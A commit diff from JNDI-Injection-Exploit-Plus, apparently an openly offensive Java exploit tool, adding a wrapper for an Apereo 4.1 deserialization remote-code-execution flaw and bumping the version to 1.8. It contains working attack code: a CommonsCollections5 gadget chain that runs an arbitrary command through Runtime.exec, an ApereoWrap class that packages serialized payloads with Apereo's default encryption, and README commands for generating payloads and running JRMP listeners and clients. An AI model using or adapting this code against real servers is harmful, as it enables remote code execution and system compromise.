add Apereo Wrapper

Author: cckuailong

README.md

@@ -109,19 +109,20 @@ Some Wrappers to wrap Deserial Data.
 Wrapper | Example Vuls
 --------| -----------
 Xstream | CVE-2021-39149
+Apereo  | Apereo 4.1 Deserialization RCE
 
 - Example
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
+$ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
 ```
 
 ![](./img/4.png)
 
 #### Web service to return Deserial Gadgets
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar
+java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar
 ```
 
 ```shell
@@ -141,7 +142,7 @@ P.S. Param wrapper & output is opetional
 Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+$ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar [-C] [command] [-A] [address]
 ```
 
 where:
@@ -171,7 +172,7 @@ Points for attention:
 Run as
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64/hex]
+$ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64/hex]
 ```
 
 where:
@@ -189,13 +190,13 @@ where:
 - JRMPListener
 
 ```shell
-java -cp JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
+java -cp JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
 ```
 
 - JRMPClient
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
+java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
 ```
 
 ## Examples
@@ -207,7 +208,7 @@ Local demo:
 1. Start the tool like this:
 
    ```shell
-   $ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
+   $ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
    ```
 
     Screenshot:
@@ -238,7 +239,7 @@ For More Examples: [Test-JNDI-Injection-Exploit-Plus](https://github.com/cckuail
 ### Deserialization Payloads
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
+$ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
 ```
 
 Base64 Output Result:

README_zh.md

@@ -19,7 +19,7 @@ P.S. 具体利用链名称及依赖见 [表格](./README.md)
 #### 使用方法
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar [-C] [command] [-A] [address]
+$ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar [-C] [command] [-A] [address]
 ```
 
 #### 参数说明
@@ -39,7 +39,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar [-C] [command] [-A]
 1. 运行工具
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
+$ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -A "127.0.0.1"
 ```
 
 ![](./img/1.png)
@@ -64,7 +64,7 @@ class Test{
 #### 使用方法
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64]
+$ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar [-C] [command] [-D] [Gadget] [-O] [bin/base64]
 ```
 
 #### 参数说明
@@ -84,7 +84,7 @@ $ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar [-C] [command] [-D]
 1. 普通
 
 ```
-$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
+$ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar -C "/System/Applications/Calculator.app/Contents/MacOS/Calculator" -D "Spring2" -O base64
 ```
 
 ![](./img/3.png)
@@ -93,32 +93,33 @@ $ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "/System/Applica
 
 - JRMPListener
 ```
-java -cp JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
+java -cp JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar exploit.JRMPListener <port> CommonsCollections1 calc
 ```
 
 - JRMPClient
 ```
-java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
+java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar -C "<ip>:<port>" -D "JRMPClient" -O base64
 ```
 
 #### 提供反序列化包装器
 
 包装器   | 示例漏洞
 --------| -----------
 Xstream | CVE-2021-39149
+Apereo  | Apereo 4.1 反序列化漏洞
 
 - 示例
 
 ```shell
-$ java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
+$ java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar -C "open -a Calculator" -D Jdk7u21 -W Xstream
 ```
 
 ![](./img/4.png)
 
 #### 可以返回反序列化数据的web服务
 
 ```shell
-java -jar JNDI-Injection-Exploit-Plus-1.7-SNAPSHOT-all.jar
+java -jar JNDI-Injection-Exploit-Plus-1.8-SNAPSHOT-all.jar
 ```
 
 ```shell

pom.xml

@@ -6,7 +6,7 @@
 
     <groupId>cckuailong</groupId>
     <artifactId>JNDI-Injection-Exploit-Plus</artifactId>
-    <version>1.7-SNAPSHOT</version>
+    <version>1.8-SNAPSHOT</version>
 
     <properties>
         <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
@@ -26,6 +26,11 @@
             <artifactId>xstream</artifactId>
             <version>1.4.19</version>
         </dependency>
+        <dependency>
+            <groupId>org.apereo</groupId>
+            <artifactId>spring-webflow-client-repo</artifactId>
+            <version>1.0.3</version>
+        </dependency>
         <!-- https://mvnrepository.com/artifact/commons-codec/commons-codec -->
         <dependency>
             <groupId>commons-codec</groupId>

src/main/java/payloads/CommonsCollections5.java

@@ -48,32 +48,33 @@
 public class CommonsCollections5 extends PayloadRunner implements ObjectPayload<BadAttributeValueExpException> {
 
 	public BadAttributeValueExpException getObject(final String command) throws Exception {
-		final String[] execArgs = new String[] { command };
+		final String[] execArgs = new String[]{command};
 		// inert chain for setup
 		final Transformer transformerChain = new ChainedTransformer(
-		        new Transformer[]{ new ConstantTransformer(1) });
+				new Transformer[]{new ConstantTransformer(1)});
 		// real chain for after setup
-		final Transformer[] transformers = new Transformer[] {
+		final Transformer[] transformers = new Transformer[]{
 				new ConstantTransformer(Runtime.class),
-				new InvokerTransformer("getMethod", new Class[] {
-					String.class, Class[].class }, new Object[] {
-					"getRuntime", new Class[0] }),
-				new InvokerTransformer("invoke", new Class[] {
-					Object.class, Object[].class }, new Object[] {
-					null, new Object[0] }),
+				new InvokerTransformer("getMethod", new Class[]{
+						String.class, Class[].class}, new Object[]{
+						"getRuntime", new Class[0]}),
+				new InvokerTransformer("invoke", new Class[]{
+						Object.class, Object[].class}, new Object[]{
+						null, new Object[0]}),
 				new InvokerTransformer("exec",
-					new Class[] { String.class }, execArgs),
-				new ConstantTransformer(1) };
+						new Class[]{String.class}, execArgs),
+				new ConstantTransformer(1)};
 
 		final Map innerMap = new HashMap();
 
 		final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);
 
 		TiedMapEntry entry = new TiedMapEntry(lazyMap, "foo");
 
+
 		BadAttributeValueExpException val = new BadAttributeValueExpException(null);
 		Field valfield = val.getClass().getDeclaredField("val");
-        Reflections.setAccessible(valfield);
+		Reflections.setAccessible(valfield);
 		valfield.set(val, entry);
 
 		Reflections.setFieldValue(transformerChain, "iTransformers", transformers); // arm with actual transformer chain

src/main/java/run/ServerStart.java

@@ -8,6 +8,7 @@
 import org.apache.commons.cli.*;
 import org.apache.commons.codec.binary.Hex;
 import org.apache.commons.lang3.StringUtils;
+import org.apache.sshd.common.util.io.NullPrintStream;
 import payloads.ObjectPayload;
 import payloads.annotation.Authors;
 import payloads.annotation.Dependencies;

src/main/java/wrappers/ApereoWrap.java

@@ -0,0 +1,21 @@
+package wrappers;
+
+import org.apereo.spring.webflow.plugin.EncryptedTranscoder;
+
+import java.io.IOException;
+import java.net.URLEncoder;
+import java.nio.charset.StandardCharsets;
+import java.util.Base64;
+import java.util.UUID;
+
+public class ApereoWrap implements ObjectWrapper<byte[]> {
+    public byte[] wrap(Object obj) throws IOException {
+        String id = UUID.randomUUID().toString();
+        EncryptedTranscoder et = new EncryptedTranscoder();
+        byte[] bytecode = et.encode(obj);
+        String payload =  Base64.getEncoder().encodeToString(bytecode);
+        String data = URLEncoder.encode(id + "_" + payload, "UTF-8");
+
+        return data.getBytes(StandardCharsets.UTF_8);
+    }
+}